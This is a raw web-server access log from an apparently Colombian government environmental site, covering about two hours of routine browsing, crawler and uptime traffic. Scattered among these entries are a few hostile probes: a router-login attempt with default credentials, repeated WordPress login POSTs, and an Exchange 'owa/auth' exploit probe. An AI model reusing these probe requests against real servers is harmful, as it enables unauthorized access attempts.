172.22.2.4 - - [23/Feb/2023:03:48:28 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [23/Feb/2023:03:48:28 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [23/Feb/2023:03:48:28 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [23/Feb/2023:03:48:28 -0500] "GET /BLA/boletinlegal/images/green-yellow-blue-pink-th.png HTTP/1.1" 200 7394
172.22.2.4 - - [23/Feb/2023:03:48:28 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [23/Feb/2023:03:48:28 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
172.22.2.4 - - [23/Feb/2023:03:48:28 -0500] "GET /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 776
172.22.2.4 - - [23/Feb/2023:03:48:28 -0500] "GET /BLA/boletinlegal/img/select-left.png HTTP/1.1" 200 263
172.22.2.4 - - [23/Feb/2023:03:48:28 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
172.22.2.4 - - [23/Feb/2023:03:48:28 -0500] "GET /BLA/boletinlegal/img/0.png HTTP/1.1" 200 110
172.22.2.4 - - [23/Feb/2023:03:48:28 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
172.22.2.4 - - [23/Feb/2023:03:48:28 -0500] "GET /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 57071
172.22.2.4 - - [23/Feb/2023:03:48:28 -0500] "GET /BLA/boletinlegal/img/button-right.png HTTP/1.1" 200 57878
172.22.2.4 - - [23/Feb/2023:03:48:28 -0500] "GET /BLA/boletinlegal/img/button.png HTTP/1.1" 200 43241
186.30.66.34 - - [23/Feb/2023:03:48:36 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13502
186.30.66.34 - - [23/Feb/2023:03:48:36 -0500] "GET /BLA/resoluciones/dlf/styles.css HTTP/1.1" 200 3049
186.30.66.34 - - [23/Feb/2023:03:48:36 -0500] "GET /BLA/resoluciones/dlf/folder.png HTTP/1.1" 200 410
186.30.66.34 - - [23/Feb/2023:03:48:39 -0500] "GET /BLA/resoluciones/dlf/bg.gif HTTP/1.1" 200 54
186.30.66.34 - - [23/Feb/2023:03:48:49 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+CONJUNTAS%2F HTTP/1.1" 200 4762
186.30.66.34 - - [23/Feb/2023:03:48:49 -0500] "GET /BLA/resoluciones/dlf/pdf.gif HTTP/1.1" 200 272
186.30.66.34 - - [23/Feb/2023:03:48:49 -0500] "GET /BLA/resoluciones/dlf/dirup.png HTTP/1.1" 200 644
186.30.66.34 - - [23/Feb/2023:03:49:21 -0500] "GET /BLA/resoluciones/index.php HTTP/1.1" 200 13502
186.30.66.34 - - [23/Feb/2023:03:49:27 -0500] "GET /BLA/resoluciones/index.php?dir=2018%2F HTTP/1.1" 200 1608
186.30.66.34 - - [23/Feb/2023:03:49:31 -0500] "GET /BLA/resoluciones/index.php HTTP/1.1" 200 13502
186.30.66.34 - - [23/Feb/2023:03:49:39 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones%2F HTTP/1.1" 200 11017
186.30.66.34 - - [23/Feb/2023:03:49:52 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones%2FRESOLUCIONES+0020%2F HTTP/1.1" 200 2077
186.30.66.34 - - [23/Feb/2023:03:49:57 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones%2F HTTP/1.1" 200 11017
186.30.66.34 - - [23/Feb/2023:03:49:59 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones%2FREGISTROS+2023%2F HTTP/1.1" 200 1871
186.30.66.34 - - [23/Feb/2023:03:50:01 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones%2F HTTP/1.1" 200 11017
186.30.66.34 - - [23/Feb/2023:03:50:03 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones%2FDISCIPLINARIOS+2019%2F HTTP/1.1" 200 3553
186.30.66.34 - - [23/Feb/2023:03:50:05 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones%2F HTTP/1.1" 200 11017
186.30.66.34 - - [23/Feb/2023:03:50:07 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones%2FAUTOS+2023%2F HTTP/1.1" 200 1843
186.30.66.34 - - [23/Feb/2023:03:50:09 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones%2F HTTP/1.1" 200 11017
186.30.66.34 - - [23/Feb/2023:03:50:11 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones%2FAUTOS+1985%2F HTTP/1.1" 200 2733
186.30.66.34 - - [23/Feb/2023:03:50:11 -0500] "GET /BLA/resoluciones/dlf/doc.gif HTTP/1.1" 200 1079
186.30.66.34 - - [23/Feb/2023:03:50:13 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones%2F HTTP/1.1" 200 11017
172.22.2.4 - - [23/Feb/2023:03:48:50 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [23/Feb/2023:03:50:42 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
186.30.66.34 - - [23/Feb/2023:03:50:56 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones%2FRESOLUCIONES+0217%2F HTTP/1.1" 200 2268
186.30.66.34 - - [23/Feb/2023:03:51:01 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones%2F HTTP/1.1" 200 11017
186.30.66.34 - - [23/Feb/2023:03:51:11 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones%2FDISCIPLINARIOS+2019%2F HTTP/1.1" 200 3553
186.30.66.34 - - [23/Feb/2023:03:51:17 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones%2F HTTP/1.1" 200 11017
172.22.2.4 - - [23/Feb/2023:03:49:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53058
35.204.9.91 - - [23/Feb/2023:03:51:33 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
186.30.66.34 - - [23/Feb/2023:03:51:52 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones%2FAUTOS+2012%2F HTTP/1.1" 200 3092
186.30.66.34 - - [23/Feb/2023:03:51:54 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones%2F HTTP/1.1" 200 11017
123.10.21.53 - - [23/Feb/2023:03:52:27 -0500] "GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0" 404 1019
216.245.221.92 - - [23/Feb/2023:03:52:46 -0500] "HEAD / HTTP/1.1" 200 -
185.119.81.104 - - [23/Feb/2023:03:54:33 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.104 - - [23/Feb/2023:03:54:34 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3650
186.30.66.34 - - [23/Feb/2023:03:54:52 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones%2FRESOLUCIONES+2012%2F HTTP/1.1" 200 2077
186.30.66.34 - - [23/Feb/2023:03:55:00 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones%2F HTTP/1.1" 200 11017
186.30.66.34 - - [23/Feb/2023:03:55:04 -0500] "GET /BLA/resoluciones/index.php HTTP/1.1" 200 13502
186.30.66.34 - - [23/Feb/2023:03:55:06 -0500] "GET /BLA/resoluciones/index.php?dir=Acuerdos%2F HTTP/1.1" 200 3396
186.30.66.34 - - [23/Feb/2023:03:55:16 -0500] "GET /BLA/resoluciones/index.php HTTP/1.1" 200 13502
186.30.66.34 - - [23/Feb/2023:03:55:20 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2010%2F HTTP/1.1" 200 278412
201.245.192.253 - - [23/Feb/2023:03:55:40 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
186.30.66.34 - - [23/Feb/2023:03:55:43 -0500] "GET /BLA/resoluciones/index.php HTTP/1.1" 200 13502
186.30.66.34 - - [23/Feb/2023:03:55:51 -0500] "GET /BLA/resoluciones/index.php?dir=Decretos%2F HTTP/1.1" 200 6804
186.30.66.34 - - [23/Feb/2023:03:55:53 -0500] "GET /BLA/resoluciones/index.php HTTP/1.1" 200 13502
186.30.66.34 - - [23/Feb/2023:03:55:55 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones%2F HTTP/1.1" 200 11017
186.30.66.34 - - [23/Feb/2023:03:55:58 -0500] "GET /BLA/resoluciones/index.php HTTP/1.1" 200 13502
157.55.39.253 - - [23/Feb/2023:03:56:16 -0500] "GET /forest/ HTTP/1.1" 200 12041
172.22.2.4 - - [23/Feb/2023:03:54:40 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
186.30.66.34 - - [23/Feb/2023:03:56:23 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2010%2F HTTP/1.1" 200 1307967
157.55.39.209 - - [23/Feb/2023:03:56:34 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 12494
186.30.66.34 - - [23/Feb/2023:03:57:06 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/2711.pdf HTTP/1.1" 200 393465
172.22.2.4 - - [23/Feb/2023:03:55:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57804
216.245.221.92 - - [23/Feb/2023:03:57:46 -0500] "HEAD / HTTP/1.1" 200 -
185.119.81.104 - - [23/Feb/2023:03:59:40 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.104 - - [23/Feb/2023:03:59:41 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3650
66.249.66.81 - - [23/Feb/2023:03:59:43 -0500] "-" 408 -
201.245.192.253 - - [23/Feb/2023:04:00:39 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [23/Feb/2023:04:01:41 -0500] "GET /BLA/boletinlegal/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f HTTP/1.1" 404 1018
35.204.9.91 - - [23/Feb/2023:04:01:42 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
40.77.167.172 - - [23/Feb/2023:04:01:48 -0500] "GET /en-el-diamundialdelmedioambiente-distrito-ejercito-nacional-y-comunidad-plantaron-120-arboles-en-parque-nacional.html HTTP/1.1" 200 838
172.22.2.4 - - [23/Feb/2023:04:00:30 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [23/Feb/2023:04:02:46 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [23/Feb/2023:04:01:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53921
201.245.192.253 - - [23/Feb/2023:04:05:37 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [23/Feb/2023:04:07:46 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [23/Feb/2023:04:06:20 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [23/Feb/2023:04:07:11 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53432
157.55.39.253 - - [23/Feb/2023:04:09:33 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/4276.pdf HTTP/1.1" 200 378400
201.245.192.253 - - [23/Feb/2023:04:10:36 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [23/Feb/2023:04:12:46 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [23/Feb/2023:04:12:10 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
185.119.81.104 - - [23/Feb/2023:04:13:57 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.104 - - [23/Feb/2023:04:13:58 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
40.77.167.201 - - [23/Feb/2023:04:14:35 -0500] "GET /BLA/resoluciones/autos%202020/0293.pdf HTTP/1.1" 200 281540
172.22.2.4 - - [23/Feb/2023:04:13:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57453
207.46.13.210 - - [23/Feb/2023:04:15:07 -0500] "GET /secretaria-de-ambiente-impone-sancion-por-puntos-de-obra-sin-permiso-en-el-humedal-tibabuyes.html HTTP/1.1" 200 990
201.245.192.253 - - [23/Feb/2023:04:15:35 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [23/Feb/2023:04:17:46 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [23/Feb/2023:04:18:24 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40914
201.245.192.253 - - [23/Feb/2023:04:18:26 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41583
172.22.2.4 - - [23/Feb/2023:04:18:00 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
185.119.81.104 - - [23/Feb/2023:04:19:54 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.104 - - [23/Feb/2023:04:19:54 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
172.22.2.4 - - [23/Feb/2023:04:18:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57453
201.245.192.253 - - [23/Feb/2023:04:20:33 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [23/Feb/2023:04:22:46 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [23/Feb/2023:04:23:50 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [23/Feb/2023:04:25:32 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [23/Feb/2023:04:24:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59164
66.249.66.79 - - [23/Feb/2023:04:26:46 -0500] "-" 408 -
40.77.167.201 - - [23/Feb/2023:04:26:55 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
216.245.221.92 - - [23/Feb/2023:04:27:46 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [23/Feb/2023:04:28:23 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40914
201.245.192.253 - - [23/Feb/2023:04:28:26 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41583
201.245.192.253 - - [23/Feb/2023:04:30:31 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [23/Feb/2023:04:29:40 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [23/Feb/2023:04:30:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57453
216.245.221.92 - - [23/Feb/2023:04:32:46 -0500] "HEAD / HTTP/1.1" 200 -
34.147.55.102 - - [23/Feb/2023:04:35:16 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
201.245.192.253 - - [23/Feb/2023:04:35:29 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [23/Feb/2023:04:35:30 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
45.33.80.237 - - [23/Feb/2023:04:37:36 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
45.33.80.237 - - [23/Feb/2023:04:37:36 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
45.33.80.237 - - [23/Feb/2023:04:37:36 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
216.245.221.92 - - [23/Feb/2023:04:37:46 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [23/Feb/2023:04:36:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59164
201.245.192.253 - - [23/Feb/2023:04:38:23 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40914
201.245.192.253 - - [23/Feb/2023:04:38:26 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41583
173.252.87.22 - - [23/Feb/2023:04:39:51 -0500] "GET /images/20%20de%20febrero%20panor\xc3\xa1mica%20de%20Bogot\xc3\xa1%20(1)%20(1).jpeg HTTP/1.1" 404 1034
201.245.192.253 - - [23/Feb/2023:04:40:27 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
173.252.95.8 - - [23/Feb/2023:04:41:28 -0500] "GET /images/20%20de%20febrero%20panor\xc3\xa1mica%20de%20Bogot\xc3\xa1%20(1)%20(1).jpeg HTTP/1.1" 404 1034
172.22.2.4 - - [23/Feb/2023:04:41:34 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [23/Feb/2023:04:41:34 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [23/Feb/2023:04:41:34 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
172.22.2.4 - - [23/Feb/2023:04:41:34 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
172.22.2.4 - - [23/Feb/2023:04:41:34 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
183.234.77.60 - - [23/Feb/2023:04:42:04 -0500] "HEAD /agendate-para-participar-en-las-caminatas-ecologicas-de-febrero.html HTTP/1.1" 200 -
183.234.77.60 - - [23/Feb/2023:04:42:04 -0500] "GET /agendate-para-participar-en-las-caminatas-ecologicas-de-febrero.html HTTP/1.1" 200 830
172.22.2.4 - - [23/Feb/2023:04:41:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 36811
216.245.221.92 - - [23/Feb/2023:04:42:46 -0500] "HEAD / HTTP/1.1" 200 -
164.90.172.139 - - [23/Feb/2023:04:42:45 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110197
172.22.2.4 - - [23/Feb/2023:04:41:20 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [23/Feb/2023:04:42:11 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57058
201.245.192.253 - - [23/Feb/2023:04:45:25 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [23/Feb/2023:04:47:46 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [23/Feb/2023:04:47:10 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [23/Feb/2023:04:48:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58803
201.245.192.253 - - [23/Feb/2023:04:50:25 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [23/Feb/2023:04:52:46 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [23/Feb/2023:04:53:20 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 304 -
172.22.2.4 - - [23/Feb/2023:04:53:00 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [23/Feb/2023:04:55:24 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [23/Feb/2023:04:53:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59164
66.249.66.79 - - [23/Feb/2023:04:56:45 -0500] "-" 408 -
216.245.221.92 - - [23/Feb/2023:04:57:46 -0500] "HEAD / HTTP/1.1" 200 -
31.13.103.22 - - [23/Feb/2023:05:00:06 -0500] "GET /images/negocios-verdes-mayo-2022.jpg HTTP/1.1" 200 48000
201.245.192.253 - - [23/Feb/2023:05:00:21 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [23/Feb/2023:04:58:50 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [23/Feb/2023:04:59:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58803
69.171.251.17 - - [23/Feb/2023:05:02:28 -0500] "GET /images/foto%202.jpg HTTP/1.1" 200 63300
69.171.251.17 - - [23/Feb/2023:05:02:29 -0500] "GET /images/foto%202.jpg HTTP/1.1" 200 63300
216.245.221.92 - - [23/Feb/2023:05:02:46 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [23/Feb/2023:05:05:21 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [23/Feb/2023:05:04:40 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [23/Feb/2023:05:05:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53432
216.245.221.92 - - [23/Feb/2023:05:07:46 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.217 - - [23/Feb/2023:05:08:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/3307.pdf HTTP/1.1" 200 432125
213.180.203.116 - - [23/Feb/2023:05:09:35 -0500] "-" 408 -
201.245.192.253 - - [23/Feb/2023:05:10:21 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [23/Feb/2023:05:11:01 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2014%20del%2011%20de%20Septiembre%20de%202012.pdf HTTP/1.1" 200 3427471
172.22.2.4 - - [23/Feb/2023:05:10:30 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [23/Feb/2023:05:12:46 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [23/Feb/2023:05:11:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59164
201.245.192.253 - - [23/Feb/2023:05:15:20 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [23/Feb/2023:05:17:46 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [23/Feb/2023:05:16:20 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [23/Feb/2023:05:18:24 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40943
201.245.192.253 - - [23/Feb/2023:05:18:26 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41415
172.22.2.4 - - [23/Feb/2023:05:17:11 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53432
185.119.81.104 - - [23/Feb/2023:05:18:58 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.104 - - [23/Feb/2023:05:18:59 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
34.147.55.102 - - [23/Feb/2023:05:20:18 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
201.245.192.253 - - [23/Feb/2023:05:20:19 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [23/Feb/2023:05:20:50 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9606
172.22.2.4 - - [23/Feb/2023:05:20:51 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
186.28.76.214 - - [23/Feb/2023:05:20:53 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13502
186.28.76.214 - - [23/Feb/2023:05:20:56 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2022%2F HTTP/1.1" 200 431327
34.141.217.75 - - [23/Feb/2023:05:21:05 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
157.55.39.217 - - [23/Feb/2023:05:24:25 -0500] "GET /BLA/resoluciones/AUTOS%202022/5790.pdf HTTP/1.1" 200 331976
66.249.72.80 - - [23/Feb/2023:05:24:37 -0500] "-" 408 -
201.245.192.253 - - [23/Feb/2023:05:25:18 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
201.245.192.253 - - [23/Feb/2023:05:28:23 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40943
201.245.192.253 - - [23/Feb/2023:05:28:26 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41415
34.91.106.182 - - [23/Feb/2023:05:29:31 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
201.245.192.253 - - [23/Feb/2023:05:30:17 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [23/Feb/2023:05:32:46 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [23/Feb/2023:05:32:10 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [23/Feb/2023:05:33:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57453
173.252.83.21 - - [23/Feb/2023:05:34:59 -0500] "GET /images/20%20de%20febrero%20panor\xc3\xa1mica%20de%20Bogot\xc3\xa1%20(1)%20(1).jpeg HTTP/1.1" 404 1034
201.245.192.253 - - [23/Feb/2023:05:35:15 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
193.32.162.159 - - [23/Feb/2023:05:36:19 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [23/Feb/2023:05:37:46 -0500] "HEAD / HTTP/1.1" 200 -
185.119.81.104 - - [23/Feb/2023:05:38:16 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.104 - - [23/Feb/2023:05:38:17 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3650
201.245.192.253 - - [23/Feb/2023:05:38:24 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40943
201.245.192.253 - - [23/Feb/2023:05:38:26 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41415
179.19.1.201 - - [23/Feb/2023:05:39:36 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
179.19.1.201 - - [23/Feb/2023:05:39:36 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 200 50058
179.19.1.201 - - [23/Feb/2023:05:39:37 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12172
179.19.1.201 - - [23/Feb/2023:05:39:37 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
179.19.1.201 - - [23/Feb/2023:05:39:37 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 200 9694
179.19.1.201 - - [23/Feb/2023:05:39:37 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 200 12592
179.19.1.201 - - [23/Feb/2023:05:39:37 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
179.19.1.201 - - [23/Feb/2023:05:39:37 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.19.1.201 - - [23/Feb/2023:05:39:37 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 200 443
179.19.1.201 - - [23/Feb/2023:05:39:37 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 200 3230
179.19.1.201 - - [23/Feb/2023:05:39:37 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 200 105384
179.19.1.201 - - [23/Feb/2023:05:39:37 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 200 53295
179.19.1.201 - - [23/Feb/2023:05:39:37 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 200 220526
179.19.1.201 - - [23/Feb/2023:05:39:37 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 200 87560
179.19.1.201 - - [23/Feb/2023:05:39:37 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 200 276924
179.19.1.201 - - [23/Feb/2023:05:39:38 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
179.19.1.201 - - [23/Feb/2023:05:39:38 -0500] "GET /sipse/css/imagen/logoSDG.png HTTP/1.1" 200 53064
179.19.1.201 - - [23/Feb/2023:05:39:38 -0500] "GET /sipse/css/imagen/loginimg.png HTTP/1.1" 200 71635
172.22.2.4 - - [23/Feb/2023:05:38:00 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
179.19.1.201 - - [23/Feb/2023:05:39:41 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 15513
